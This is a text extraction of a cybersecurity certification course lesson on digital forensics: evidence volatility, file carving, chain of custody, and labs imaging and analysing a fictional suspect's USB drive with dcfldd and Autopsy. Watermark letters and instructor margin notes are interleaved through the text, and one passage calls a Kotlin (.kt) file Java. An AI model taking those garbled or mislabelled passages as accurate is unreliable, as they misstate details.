1. CPU registers, CPU caches, and RAM.
D
2. Network caches and virtual memory.
3. Hard drives, flash drives, and solid-state drives (SSDs).
4. CD-ROMs, DVD-ROMs, and printouts.
or
Note: Volatility may also refer to the memory's impermanence when disconnected from a
power source. RAM loses its memory when it loses power, and is therefore volatile. An SSD will
retain its memory even when it loses power, and is therefore non-volatile.
e
The order of volatility is another factor that will influence your response to incidents. Highly volatile
at
memory like RAM may not be worth your time to present as evidence, as any trace of an intrusion
might be gone from the cache before you can possibly capture it. Still, some experiments have
shown that cryogenically frozen memory may be able to retain its non-degraded state for several
lic
days. For most organizations, this will not be a feasible option, but it could be a viable means of
forensic preservation in the future.
up
Instead of relying on an after-the-fact collection of volatile data, there are tools that can automate
volatile memory collection on live systems, even for highly volatile memory. These tools are often
batch scripts that execute various other tools to continuously capture and log network traffic,
operating system registries, RAM snapshots, and more. Committing these types of information to
D
permanent memory can pose a risk, so you must remember to follow the proper chain of custody
procedures to keep the information from being stolen or tampered with.
ot
File Systems
N
A computer's file system can reveal a great deal of useful information concerning an incident, File Systems
including the following:
• Directory structure.
o
• File location.
• File size.
D
• File names.
• Date and time values (last modified, last accessed, etc.).
• Miscellaneous attributes of files and folders.
Analyzing this metadata can help you establish your timeline of events for an incident that has left
traces on a host and its files.
Lesson 11: Investigating Cybersecurity Incidents | Topic B

There are a number of methods you can use to collect this metadata. Capturing a drive image will
keep the file system intact for later analysis. For a more specialized approach, there are various tools
that can help you collect and view file system metadata. For example, TSK is a forensic tool that can
analyze a file system without needing to go through the operating system. This makes the tool ideal
for collecting hidden or deleted files.
Not all file systems handle metadata the same. Factors like the age of the hardware and software, as
well as their manufacturer, may influence which file system type is used on a host. Older computers,
for example, may still use File Allocation Table 32 (FAT32), whereas newer Windows hosts will use
New Technology File System (NTFS) or, less commonly, Resilient File System (ReFS). Apple
e
macOS computers typically use Apple File System (APFS) or Hierarchical File System Plus (HFS+),
ut
whereas Linux distributions commonly use ext3, ext4, Btrfs, or ZFS. Flash memory devices like
USB thumb drives and SD cards, regardless of what operating system they're used with, often use
Extensible File Allocation Table (exFAT).
ib
Some collection tools like TSK actually support most of the major file system types, but you should
still be aware of the file system you're collecting.
tr
File Carving and Data Extraction
is
File Carving and Data File carving is the process of extracting data from a computer when that data has no associated file
Extraction system metadata. The file system metadata describes where a file exists in memory. Because files are
D
often fragmented into many pieces, there is not one single address that the file resides in. This is
why file system metadata that collates many addresses is so useful. When a user performs a normal
delete operation, like moving a document to the recycle bin, the file system deletes its metadata on
or
that file, rather than actually deleting where it is in memory. When you engage in file carving, you are
attempting to piece these fragments together to reconstruct the file.
This is essential to evidence collection, as even files a malicious user tries to delete may remain on
e
the target system. Data recovery software like PhotoRec and Foremost can perform file carving
techniques to extract deleted or corrupted data from a drive partition.
at
Data Preservation for Forensics

lic
Data Preservation for Criminal cases or internal security audits can take months or years to resolve. You must be able to
Forensics preserve all the gathered evidence in a proper manner for a lengthy period of time. As you're
up
probably aware, computer hardware is prone to wear and tear, and important storage media like
hard disks can fail even when used normally, or when not used at all. A failure of this kind may
mean the corruption or loss of your evidence, both of which may have severe repercussions for your
investigation.
D
Therefore, when possible, you should replicate evidence across multiple storage media for the
purpose of redundancy. You should also be careful when selecting where to physically store this
ot
hardware. Rooms without proper climate controls will increase the risk of hardware failure,
especially if these electronics overheat.
Evidence can also become overwhelming by its sheer size and scope. That's why it's important to
N
create metadata that accurately defines characteristics about data, like its type, the date it was
collected and hashed, and what purpose it serves.
o
Secure Storage of Physical Evidence

D
Secure Storage of It's inevitable that data on physical media will need to be stored before it is presented in court. How
Physical Evidence you store evidence to prevent malicious tampering is just as important as storing it to prevent
natural degradation. Physical media should be placed in evidence rooms that have controls like
locks, guards, surveillance cameras, etc. The only people with access to this room should be
authorized investigators. Even managers or executives should be barred from accessing the room

during an ongoing investigation, as they may not be familiar with proper evidence-handling
protocol.
Storing the media in a secure room is often not enough. Depending on the nature of the physical
medium, including its size and sensitivity to contact with other materials, you should consider
placing it in a lock box. If some unauthorized person does gain entry to the evidence room, they
won't necessarily be able to get to the evidence itself without considerable effort.
However, not all evidence needs this level of protection. For smaller media, like hard drives, discs,
thumb drives, and so on, placing them in evidence bags may be sufficient. Evidence bags are not
e
meant to ensure security directly, but they do help you identify, label, and categorize evidence
properly. The evidence bags you use might have space on at least one side for you to write the
ut
evidence's type, case number, date of collection, name of collecting agent, and a short description.
In the absence of such a space to write in, you may be able to affix an evidence tag to the bag that
has the same basic information on it. Using the space or a tag, you should also be able to maintain a
ib
chain of custody—every time a new person handles the bag and its contents, the chain from person
to person is recorded.
tr
Forensic Analysis of Compromised Systems
is
There are various procedures you can follow to help you analyze compromised systems in the event Forensic Analysis of
of an incident. Compromised Systems
D
Remind students that
Forensic Procedure Description the forensic procedures
Capture forensic
images and memory or
One of the most important steps in computer forensic evidence
procedures is to capture exact duplicates of the evidence, also known as
forensic images. This is accomplished by making a bit-for-bit copy of a
they implement will
depend heavily on the
context of the incident.
e
piece of media as an image file with high accuracy—a process called bit-
stream imaging. In addition, dumping a system's memory may reveal
at
actionable evidence that would otherwise be lost when the system is

powered down.
lic
Examine network Attackers always leave behind traces; you just need to know how and
traffic and logs where to look. Logs record everything that happens in an intrusion
prevention system (IPS) or intrusion detection system (IDS), and in
up
routers, firewalls, servers, desktops, mainframes, applications, databases,

anti-malware software, and virtual private networks (VPNs). With these
logs, it is possible to extract the identity of hackers and provide the
evidence needed.
D
Capture video Video forensics is the method by which video is scrutinized for clues.
Tools for computer forensics are used in reassembling video to be used
ot
as evidence in a court of law.

Record time offset The format in which the time is recorded against a file activity, such as
file creation, deletion, last modified, and last accessed, has developed to
N
incorporate a local time zone offset against Greenwich Mean Time

(GMT). This makes it easier for forensic investigators to determine the
exact time the activity took place, even if the computer is moved from
o
one time zone to another or if the time zone has deliberately been
changed on a system.
D
Take hashes You should take a hash of each piece of electronic evidence, including
storage partitions, software, and individual files. Later, law enforcement
or other third-party officials can verify the integrity of this evidence by
taking their own hashes. If the hashes match, then they can be reasonably
certain that the evidence was not tampered with.

Forensic Procedure Description

Take screenshots and You should capture screenshots of each and every step of a forensic
photographs procedure, especially when you are retrieving evidence using a forensics
tool. This will ensure that data present on a compromised system is not
tampered with and also provides the court with proof of your use of valid
computer forensic methods while extracting the evidence. You should
also take photographs of a physical crime scene, especially an undisrupted
one, to record physical evidence in its purest, unaltered state.
e
Identify witnesses Courts generally accept evidence if it is seconded by the testimony of a
ut
witness who observed the procedure by which the evidence was acquired.
A computer forensic expert witness is someone who has experience in
handling computer forensic tools and is able to establish the validity of
ib
the evidence.
Track man hours and The increase in storage device capacities and encryption strength affects
tr
expenses the number of man hours that it can take to assess damage, and
consequently increase expenses incurred in any computer forensics
investigation. Capturing this expense is part of the overall damage
is
assessment for the incident. You may also be required to track these
things if your organization has an insurance policy.
D
Dynamic Analysis
or
Most of the procedures listed in the previous table are considered static analysis procedures. They
involve capturing and examining information that is not meant to change or interact with a
particular environment. This may not be adequate for your forensic investigation, however.
Dynamic analysis procedures enable you to observe evidence as it exhibits activity. This activity may
e
reveal more about the nature of an incident than if you had been analyzing evidence in an inert state.
at
Most dynamic analysis centers around the use of virtual machine sandboxes, like those used for
analyzing malware. Evidence that runs in a sandbox might be able to replicate the events of an
incident in a controlled environment, or it might provide you with more information about the
lic
source of an incident or its mechanism of action. For example, if you capture a system image, you
can construct a VM of that system and run it in the sandbox—taking note of any malicious
processes that start automatically.
up
Guidelines for Securely Collecting and Analyzing Electronic

Evidence
D
Guidelines for Securely Follow these guidelines when collecting and analyzing electronic evidence.
Collecting and Analyzing
ot
Electronic Evidence Securely Collecting and Analyzing Electronic Evidence

When collecting and analyzing electronic evidence:
N
• Collect evidence according to the order of volatility by which data degrades on various storage
media.
• Identify the file system and available metadata of the media you're analyzing.
o
• Engage in file carving and data recovery processes when no file system metadata is present.
D
• Ensure evidence data is preserved against degradation over a long period of time.
• Replicate evidence data across multiple storage media.
• Record useful and accurate metadata about data collected as evidence.
• Ensure physical evidence is locked behind access control mechanisms to keep unauthorized
personnel out.
• Consider placing storage media used as evidence in evidence bags with proper labeling.

• Apply the necessary forensic techniques when collecting and analyzing evidence, including
capturing bit-stream images, taking hashes, taking pictures, etc.
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

ACTIVITY 11-2
Securely Collecting Electronic Evidence
Before You Begin
e
A virtual copy of Rupert's confiscated USB drive has been added to Kali Linux. You will be using
dcfldd, a forensic imaging tool.
ut
Activity: Securely
Collecting Electronic Scenario
ib
Evidence
You presented your preliminary findings to upper management, and they've agreed to confront
Students may point out
Rupert. Rupert's supervisor noticed him using a USB drive on his workstation, and asked him to
that the hashing
tr
algorithm used in this
hand it over. Rupert reluctantly complied, and his supervisor passed custody of the USB drive on to
activity (MD5) is you. Management is considering criminal charges against Rupert, so you need to follow proper
forensic procedures and make a secure bitwise copy of the drive.
is
insecure. This is true,
but Autopsy only
supports MD5
D
verification. 1. Make a forensic image of the USB drive using the dcfldd tool.
a) On the Kali Linux desktop, verify that there is a virtual USB drive icon on the desktop (RUPERT).
or
e
at
lic
Note: In a real-world situation, you would connect the USB drive to your
analysis system using a physical write blocker to ensure that you change
nothing on the evidence drive.
up
This is the captured drive for the incident scenario.

b) Open a terminal and enter sudo fdisk -l
D
ot
N
o
D

c) Verify that there is a 50 megabyte (MB) drive with the name /dev/loop0
e
ut
ib
tr
is
This is the location of the mounted USB drive image.
D
d) Enter sudo dcfldd if=/dev/loop0 hash=md5 of=~/Desktop/usbimage.dd
hashlog=~/Desktop/hash.txt bs=512
or
Note: In this command, if is the input device, of is the output file, hash is the
preferred hash for integrity checking, hashlog saves the hash to a file, and bs
is the block transfer size.
e
e) After the process is complete, verify that the image file was written, as in the following screenshot.
at
lic
f) From the Kali Linux desktop, double-click hash.txt to open it.

up
g) Verify the hash is the same as in the following screenshot, and keep this text file open. Students will copy this
hash in the next activity,
but you may wish to
D
have them copy it now.

ot
N
Assure students that

2. Why is it important to take note of the hash value of the drive image? they will analyze the
contents of the USB
o
A: A hash value supports integrity of evidence; when the drive image moves down the chain of drive in the next activity.
custody, the actual hash can be compared to the expected value. If they match, the forensic
D
analyst or court official can confirm that the evidence was not tampered with during this time.
3. What kinds of important metadata are usually collected in a drive image such
as this one? How can this metadata shape your investigation?
A: Answers may vary, but metadata can include: directory structure, file locations, file sizes, and the
date a file was created/last modified. This metadata can help a forensic analyst correlate data and
come to understand the bigger picture of an incident.

4. When it comes to keeping this drive image secure, what sort of preservation
techniques would you recommend?
A: Answers will vary. Because data is virtual, and must depend on physical hardware, it's a good idea
to replicate this image across more than one physical medium in case one were to fail. The rooms
in which you store these physical media should be locked and climate controlled.
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

ACTIVITY 11-3
Analyzing Forensic Evidence
Before You Begin
e
You'll be using Autopsy, a forensic analysis tool, to investigate the USB drive image you captured
earlier.
ut
Activity: Analyzing
Scenario Forensic Evidence
ib
Now that you've securely collected evidence from Rupert's USB drive, you can begin the process of
analyzing the evidence to determine who really is responsible for the incident, why they did it, and
tr
how. Being able to answer these questions will not only help you piece together what happened, but
will also be extremely valuable in the event that Develetech decides to press charges.
is
1. Start Autopsy.
D
a) Open another terminal window.
b) Enter sudo autopsy
c) Right-click the URL and select Open Link.
The Autopsy front-end opens in the Firefox ESR web browser.
or
e
at
lic
up
D
ot
N
2. Using the web browser, create a new case file for RupertCase.
a) Select the New Case button.
o
b) In the Case Name field, type RupertCase

c) In the Description field, type Possible Industrial Espionage
D
d) In the Investigator Names field, type your name.

e) Select the New Case button to start your case file.
3. Add a host to the RupertCase file.

a) On the Creating Case page, select Add Host.
b) On the Add a New Host page, replace the text in the Host Name field with USB_Drive
c) In the Description field, type Captured USB

d) Leave the remaining field data at its default and select the Add Host button.
4. Add an image file to the RupertCase file.

a) Select the Add Image button.
b) Select the Add Image File button.
c) In the Location field, type /home/kali/Desktop/usbimage.dd
d) From the Type, select Partition.
e
ut
ib
tr
is
D
or
e
at
lic
up
e) Select Next.
f) Under Image File Details, select the Add the following MD5 hash value for this image radio button.
g) Return to the open hash.txt file in Kali Linux that has the hash value.
D
h) Highlight the MD5 hash value (everything after the colon), then, from the Mousepad menu, select
Edit→Copy.
i) Paste the hash value into the text box back in Autopsy.
ot
N
o
D

j) Check the Verify hash after importing? check box.
e
ut
ib
tr
is
D
k) Select the Add button.
l) After the integrity check passes, select OK.
or
e
at
lic
up
D
5. Begin examining the captured USB drive for evidence.

a) With the usbimage.dd-0-0 radio button selected, select Analyze.
ot
b) At the top of the screen, select File Analysis.

N
o
D

c) Browse through the files and directories in the top pane.
e
ut
ib
The details for each file are shown in columns to the right of the file name. They include metadata
about when the file was last written/modified, when it was last accessed, when it was created, and
how large it is.
tr
The $FAT1, $FAT2, and $MBR entries refer to volume metadata, particularly file system data and
master boot record (MBR) data. Rupert's USB drive was formatted as FAT32. Everything else is
is
either a file or folder placed there by a user.
Also note that some file names are in red, indicating that they were deleted from this USB storage
D
drive. You can open the RUPERT drive from the desktop to verify that the file browser doesn't show
these files—only a forensic tool like Autopsy can recover them.
6.
or
Focusing on just the non-deleted files, what does this tell you about Rupert's
interests? Is there anything incriminating so far?
A: Rupert seems to be interested in video games, as the drive includes various files related to them.
That's obviously not incriminating by itself, but it may suggest that he was wasting company time
e
and resources if he was using this drive at work. More interestingly, the drive includes the
at
my_contract_invoice3.docx file that the CSIRT identified earlier as being correlated with Pat's
breached workstation. There's also a ZIP file with the somewhat suspicious name of nethack-360-
win-x86-2.zip.
lic
7. Investigate some of the conspicuous surface files.

a) Select the my_contract_invoice3.docx link.
up
b) In the bottom pane, verify that Autopsy attempted to provide a preview of the file.
D
ot
N
o
D
Autopsy can't read DOCX files, but it does at least identify it as being a Microsoft Word 2007+ file.
You can see the raw data that Autopsy failed to parse. You could export this file and open it in a
word processing program, but ultimately, the details of Rupert's invoice aren't important; it's the
presence of the file that matters.

c) In the file list, select the nethack-360-win-x86-2.zip link.

d) In the bottom pane, select Export.
e
ut
ib
e) In the file download dialog box, ensure Open with Engrampa Archive Manager (default) is selected,
then select OK.
The ZIP archive opens in a file browser. There appears to be various file types, including dynamic
tr
link libraries (DLLs), executable files, and some text files. This is obviously some kind of program for
Microsoft Windows.
is
f) Double-click NetHack.txt to open it, then skim through the description.
D
8. What is this program? Is it incriminating?
A: NetHack is an old text-based dungeon crawler video game. Despite its name, it's not useful for
malicious purposes, so there's nothing really incriminating about it. Red herrings like this are
9.
always a possibility in forensic work.
Investigate the files that were deleted from the USB drive.
or
e
a) Close the text file and the file browser related to NetHack.
b) From the bottom left of the Autopsy web page, scroll down and select All Deleted Files.
at
lic
up
D
ot
c) Verify that you see a list of all of the deleted files and folders that Autopsy was able to recover.
N
o
D

10.Justby looking at the list of names, what can you tell about what was deleted
from this USB drive?
A: Several files and one folder were deleted. The folder is called DT_Watch_images, and the files
have various names, some of which appear incomplete. It may be possible to guess the contents
of some of the files based on their names and file extensions. For example, dt-
w1_product_specs.pdf is likely the product specification document for Develetech's smartwatch.
11.Continue your investigation of the deleted files.
e
a) Focus on the files that end in JPG and PNG file extensions.
All of these files begin with $OrphanFiles in their names. Files are orphaned when their parent folder
ut
is deleted or otherwise unrecoverable. As you might have guessed, these files were inside the
DT_Watch_images folder when it was deleted.
b) Select the C:/$OrphanFiles/_MARTW~1.PNG file to open it in the bottom pane.
ib
c) Verify that Autopsy was able to recover the image and display a thumbnail preview of it.
tr
is
D
or
d) Select the View Full Size Image link to get a better look at the smartwatch processor schematic.
This is very likely the smartwatch_schematic3.png file that was logged in the anti-malware scan of
e
Pat's workstation.
at
e) Close the tab with the image to return to the directory analysis interface.
f) Back at the top of the file list, select the C:/accel_data_for_ml.csv link.
g) In the bottom pane, verify that Autopsy was able to open this comma-separated values (CSV) file.
lic
up
D
ot
N
This appears to be a dataset. There are rows and columns of data that track different human
activities like walking and running, as well as positioning data at certain timestamps. Develetech
may have been incorporating machine learning into its smartwatch product.
o
h) In the list of files, select the C:/dt-w1_product_specs.pdf link.

D
i) Select Export, then, with Open with Firefox selected in the dialog box, then OK.

j) Verify that you can see the product specification document for Develetech's smartwatch—the
LifeWatch.
e
ut
ib
tr
is
D
or
There's quite a bit of interesting information about the LifeWatch in this document, including its
physical specs, its operating system (Wear OS), its known issues, its testing results, and images of
the product. And, as the watermark and footer imply, it's all meant to be confidential.
e
k) Close the tab with the PDF to return to the directory analysis interface.
at
l) In the list of files, select the C:/lfui_app_proj_b1.zip link.

m) Select Export, then, with Open with Engrampa Archive Manager (default) selected in the dialog box,
select OK.
lic
n) Browse through the files in this ZIP archive as desired.

up
D
ot
N
o
D

o) Navigate to LifeWatchUI/app/src/main/java/com/develetech/lifewatchui and double-click

LifeWatchFace.kt to open it in a text editor.
e
ut
ib
tr
is
D
or
This is programming code. It's written in Java, one of the languages used to write Android apps. You
can even see Android class declarations at the top of the file. Recall that the product specification
document listed Wear OS as LifeWatch's operating system; Wear OS is a version of Android for
wearable technology. This appears to be a beta version of LifeWatch's user interface app for Wear
OS.
e
p) Close the text file and the file browser related to the LifeWatchUI app.
at
If students choose to
withhold judgment, ask 12.How will using this tool help you in your case against Rupert?
them what other
lic
evidence they would A: It enables a detailed analysis of information from drive images and gives an investigator the ability
need to be convinced of to write notes about content and examine evidence without risking contamination of the original
Rupert's guilt. Use this evidence.
up
as a way to start a
discussion about the 13.Review all of the artifacts you identified and recovered from Rupert's USB
importance of critical drive. Examine them again in Autopsy if needed. Consider these artifacts in
thinking in forensic
light of what you already know about the events of the incident, as well as the
D
analysis.
fact that these are highly sensitive files that Rupert does not have
authorization to view, much less copy off the server.
ot
Considering all of your work so far, how confident are you of Rupert's
involvement in the incident?
N
A: Answers will vary. Some will think the evidence is overwhelmingly suggesting that Rupert
attempted to steal sensitive data from the company and then cover his tracks. Others may hold
out on committing to a final judgment, and will want to see if there is any more evidence that could
o
make them more certain.

D

14.The team is looking to establish a motive. They've interviewed some of

Rupert's coworkers, some of whom reveal that Rupert appeared frustrated
with his job. He believed that he was underpaid and treated poorly by his
bosses. His coworkers claim that, only a few days ago, Rupert mentioned he
was offered a job by a competitor.
Given the nature of the evidence you've analyzed, what would you suggest
Rupert's intentions were?
e
A: Answers will vary, but assuming his coworkers' testimony is accurate, Rupert was likely intending
to sabotage Develetech, either by giving away its secrets or by selling those secrets to a
ut
competitor.
15.Close Autopsy and any other open windows in Kali Linux.
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

TOPIC C
Follow Up on the Results of an Investigation
No job is done until the paperwork is complete. After you've completed the investigation, you'll
need to document your findings in a way that meets with applicable rules, regulations, and laws.
You'll also need to follow up to ensure that your organization is protected from a recurrence of such
e
an incident.
ut
Cyberlaw
ib
Cyberlaw Cyberlaw governs the behavior of individuals and groups in the use of computers, the Internet, and
other IT domains. As with other aspects of the law, the definition and makeup of cyberlaw will vary
from state to state and nation to nation. In general, governments that enact and enforce cyberlaws
tr
extend legal protection to victims of computer-related crimes, while punishing the perpetrators of
these crimes.
is
In the event your organization is the victim of a security breach or other incident, you may be called
on to present evidence in court or act as an expert witness. Even if you are not directly involved in
D
court proceedings, you may be asked to assemble and prepare evidence for a judge. This is why, as a
forensic analyst, you should be aware of the cyberlaws that govern your particular jurisdiction.
Knowing which laws were broken can help you contextualize your reports in a legal sense, rather
or
than simply dumping all of your collection and analysis efforts into a single, uncoordinated pile of
evidence. Legal counsel can help you interpret the law, but it may be up to you to bridge the gap
between the technical aspects of evidence and the legal ramifications.
e
Keep in mind that not all incidents are legal matters, be it because the incident is not covered under
the law or because the victim organization chooses not to press charges.
at
Note: Most states have passed their own cyberlaws beyond those of the federal government.
lic
Example
up
An example of a cyberlaw is the U.S. Computer Fraud and Abuse Act (CFAA). This law
prohibits users from accessing computer systems without authorization and, as a result, obtaining
sensitive information like financial records, government records, or any information from a
computer with a protected status. Protected computers are defined as computers that are used by
D
financial and government institutions, as well as computers used in interstate and foreign commerce.
Note: For the full text of the CFAA, navigate to https://www.law.cornell.edu/uscode/
ot
text/18/1030.
N
Cyberlaw Internationally
Cyberlaw can vary significantly depending on the jurisdiction, especially in different countries and
regions. What constitutes a cybercrime in the United States may not be the same in Germany, Japan,
o
Australia, etc. Although you may not think you're subject to any laws other than the ones in your
organization's home country, consider how widespread and distributed information is today. If your
D
business is headquartered in New York, and you hire a cloud storage firm in London that distributes
your data to servers around the world, what are the legal ramifications in the event of a breach? It's
very likely that your legal case will be subject to the jurisdiction of several foreign nations, not just
your own. It may not be enough to know your own country's laws, so you may need to know the
laws of the countries that govern where your data is stored.
Lesson 11: Investigating Cybersecurity Incidents | Topic C

Technical Experts and Law Enforcement Liaisons

Following an investigation that becomes a legal matter, you may be asked to serve as a technical Technical Experts and
expert or a liaison to law enforcement. When you take on these roles, you'll be able to communicate Law Enforcement
the who, why, and how of an incident to the authorities that can take legal action. If your company Liaisons
does not work closely with law enforcement, it stands little chance of receiving restitution.
To truly take advantage of your organization's legal rights, you need to understand both the abilities
and the constraints of law enforcement. Some agencies, like the Federal Bureau of Investigation
(FBI), are more well suited to dealing with major cybercriminal activity than others. These agencies
e
often have a threshold for interest in an investigation. If your presumed losses barely surpass a few
ut
thousand dollars, some agencies may not even bother taking on the investigation. Likewise, smaller,
local agencies may be ill equipped, both in staff and technology, to assist in your investigation.
It's also important to understand that law enforcement should not be expected to do all of the work
ib
in an investigation. As a liaison or technical expert, you need to share pertinent evidence with
authorities without overburdening them with trivial information. You should find out exactly what
they need from you—and communicate exactly what you need from them—to ensure a smooth
tr
transition. For example, you may need to share your hashed drive images with the authorities, as
well as explain their contents and how they may contain evidence of an intrusion. On the other
is
hand, the authorities may possess forensic tools and techniques that go beyond your own
capabilities. These might be of great benefit to your investigation.
D
Documentation of Investigation Results
or
While some forensic tools may have reporting capabilities built in, this is often insufficient to
present as an official report to a wider audience. Tool-assisted reports can be overly technical and
fail to get to the point. That's why you should consider manually writing your reports based on the
Documentation of
Investigation Results
e
results of your investigation. To be effective, these reports must answer the following questions:
• Who tasked you with the investigation?
at
Use this question to remind yourself who asked you to begin this investigation to establish a clear
authority. As mentioned before, investigations are not guaranteed to be quick; on the contrary,
lic
many are very slow to progress. Without a record, you may forget. This is especially true if
personnel changes in the interim or if the company is part of a merger or another change in
ownership.
up
• What were you tasked with?

Use this question to avoid any confusion or disputes at the end of an investigation. You need to
define a clear focus of your investigation. Failing to do so may compromise your investigation by
D
bogging it down in irrelevant details or making it seem incoherent.

• What did you investigate?
Use this question to outline all of the actual objects of your investigation, including technology
ot
(such as workstations, network appliances, etc.) and people (such as witnesses, suspects, etc.). It
is very important that your record of these objects is comprehensive. Instead of simply stating
you reviewed "an employee's workstation," you should instead say: "A Dell Inspiron laptop with
N
serial number 12345 running Windows 10, assigned to Aaron Jones on November 21st, 2020 by
the company."
o
• What did you do?

For this question, you should detail the steps you took to actually conduct the investigation. This
D
can include technical processes like capturing system images and taking hashes, and it can also
include more operational processes like maintaining the chain of custody by placing evidence in
secure, labeled containers.
• What did you find?
You must record all significant events, files, images, machines, testimony, and so on, that are
relevant to the investigation. This report is not just to help you remember, but will also likely
need to be geared toward an audience, like a boss or the arbiter(s) of the court case. That's why

you need to write plainly and practically, and avoid using jargon. For example: "The login records
show that a user was signed in under the account A. Jones while the incident took place."
• What does it all mean?
This last question prompts you to piece all of your findings together to offer a conclusion. What
do you believe happened, how did it happen, and who do you think is responsible? You cannot
necessarily rely on the audience of this report to draw their own conclusions; they'll likely be
looking for you to do that, so they can verify the validity of those conclusions. Although these
conclusions may be subject to bias, if you support them with evidence, the arbiter(s) of the case
will be more inclined to agree.
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

ACTIVITY 11-4
Conducting Post-Mortem Activities
Scenario
e
The investigation is nearing its conclusion, and the evidence points to Rupert as the culprit. The
company has terminated his employment as of today. Although you've identified who caused the
ut
incident and how, your work is not over. You still need to write a report of your findings, as well as
prepare to be involved in a criminal investigation. It's up to you to maximize the usefulness of these
ib
follow-up tasks for the benefit of the company and its continued security.
Post-Mortem Activities
tr
1. Autopsy offers tool-assisted reporting for your investigation, but you need to Consider using this
activity as an opportunity
tailor a report to a wider audience that includes upper management.
is
for students to actually
write a forensic report.
Based on your findings of the data breach incident, what would you include in Otherwise, have them
D
this report? share their ideas with
A: Answers will vary. A useful report includes the following information: who authorized the the class about how the
investigation, the focus of the investigation, the specific people and systems you investigated, report should be written.
or
what you found, and how it all comes together. For the data breach incident, you may choose to
begin the report by stating that you were authorized to perform the investigation by the CISO of
Develetech, and that you were tasked with finding out what data was breached and who was
responsible. The assets that the team investigated were: Pat's workstation, the system and anti-
e
malware logs on that workstation, the research and development server, the system and network
logs of that server, the network logs of various other devices, the people who were indirectly
at
affected by the incident (Charles and the help desk employee), one of the victims (Pat), and the
primary suspect (Rupert). What you found is evidence of a failed remote login attempt, evidence
of a remote connection from inside the network using certain credentials (Pat's), network logs
lic
supporting these connection attempts, host and anti-malware logs indicating that sensitive files
were transferred off the research and development server, the USB drive with those files on them,
and more. You could then likely end with a way to pull it all together, constructing a single
narrative of events as implied by the evidence you found. This narrative should go step-by-step
up
and explain how Rupert breached the server, why he did so, and what he might have done with
this stolen data.
D
2. Based on your thorough report, management has decided to work with legal
counsel to determine if any criminal charges can or should be filed.
ot
If Develetech decides to press charges, what can you do to help this

initiative?
N
A: Answers may vary, but a forensic investigator should research the laws that govern the
organization, including specifically which laws may have been broken as a result of the data
breach. If legal counsel advises the company to press charges, you can further tailor your report
to speak to the applicable laws. For example, some laws will place greater value on certain types
o
of evidence, so you'll want to make sure the report focuses on that evidence so that it clearly
illustrates how the law was broken.
D

3. After consulting with its attorneys, the executives at Develetech have decided
to press charges against Rupert. The company believes its intellectual
property and trade secrets have been stolen for financial gain, which is a
violation of the Economic Espionage Act of 1996. In the trial preparation
phase, you will be a law enforcement liaison.
How would you suggest collaborating with this non-technical audience?
A: Answers will vary. It's important that the liaison clearly understands what law enforcement officials
e
expect of them, and likewise, communicates what they expect of the officials. This will enable you
to exchange information and evidence without issue. Also, you shouldn't expect that local law
ut
enforcement will provide a comprehensive level of assistance to your investigation; you may need
to do most of the remaining work internally. Still, some agencies (particularly federal ones) may
have tools at their disposal that you do not. You should take advantage of these tools wherever
ib
possible.
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

Summary
In this lesson, you switched roles from the first responder to that of a forensic investigator. You
created a forensic investigation plan, collected evidence, and reconstructed the incident to determine
how the incident was carried out and the motives behind it. You also implemented post-
investigation measures that included documenting the investigation and preparing for legal action.
From your experience, share a cybersecurity incident that warranted a forensic
e
use the social
investigation. networking tools
ut
A: Answers will vary. Be prepared to offer an example of a cybersecurity incident that escalated into an provided on the CHOICE
investigation. If necessary, you can use an incident from recent real-world events. Course screen to follow
ib
What evidence preservation techniques are most commonly implemented in the course is completed
your organization or an organization you're familiar with? for further discussion
A: Answers will vary. Some students may have experience with physical techniques like placing
tr
continued learning.
compromised hardware in lockers or access-controlled rooms. They may also be familiar with
evidence bags with labels that help track the chain of custody. For virtual assets, students may be
is
familiar with the process of capturing system images and placing them in secure virtual locations, as
well as employing encryption to keep the data confidential.
D
or
e
at
lic
up
D
ot
N
o
D
Lesson 11: Investigating Cybersecurity Incidents |

e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

Course Follow-Up
Congratulations! You have completed the CyberSec First Responder® (Exam CFR-410) course. You
have gained the practical skills and information you will need to manage risk, analyze threats and
attacks, protect the organization's security, collect and analyze cybersecurity intelligence, and
respond to and investigate incidents. All of these skills combined will help you proactively defend
your organization against the many threats it faces every day.
You've also gained the knowledge you will need to prepare for the CyberSec First Responder®
e
(Exam CFR-410) certification examination. If you combine this class experience with review, private
study, and hands-on experience, you will be well prepared to demonstrate your security expertise
ut
both through professional certification and with solid technical competence on the job.
What's Next?
ib
Your next step after completing this course will probably be to prepare for and obtain your
CyberSec First Responder certification. In addition, there are a number of advanced and specialized
tr
security courses and certifications that you might want to pursue following this course. The Logical
Operations course Certified Information Systems Security Professional (CISSP®): Sixth Edition will expand
is
on your knowledge of information security to apply more advanced principles to maintain security
in complex enterprise environments. The Certified Cyber Secure Coder® (Exam CSC-210) course will
provide you with the skills to develop applications that incorporate security principles throughout
D
the entire development lifecycle. To learn more about artificial intelligence (AI) and machine
learning concepts that are used in cybersecurity solutions like SIEMs and EDR, consider taking the
or
Certified Artificial Intelligence (AI) Practitioner (Exam AIP-110) course. There are also many vendor-
specific courses available that include material on securing various computing systems.
You are encouraged to explore computer and network security further by actively participating in
any of the social media forums set up by your instructor or training administrator through the
e
Social Media tile on the CHOICE Course screen.
at
lic
up
D
ot
N
o
D
Course Follow up
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

A Mapping Course Content
to CyberSec First
e
ut
Responder® (Exam
ib
CFR-410)
tr
is
Obtaining CyberSec First Responder® certification requires candidates to pass the exam
D
CyberSec First Responder® (Exam CFR-410).
To assist you in your preparation for the exam, CertNexus has provided a reference
or
document that indicates where the exam objectives are covered in the CertNexus CyberSec
First Responder® (Exam CFR-410) courseware.
The exam-mapping document is available from the Course page on CHOICE. Log on to
your CHOICE account, select the tile for this course, select the Files tile, and download
e
and unzip the course files. The mapping reference will be in a subfolder named Mappings.
at
Best of luck in your exam preparation!

lic
up
D
ot
N
o
D

e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

B Regular Expressions
e
ut
ib
Appendix Introduction
tr
The following appendix provides an overview of regular expressions and how they may be
is
useful to your log analysis efforts.
D
or
e
at
lic
up
D
ot
N
o
D

TOPIC A
Parse Log Files with Regular Expressions
Whether you're using command-line tools or graphical security information and event management
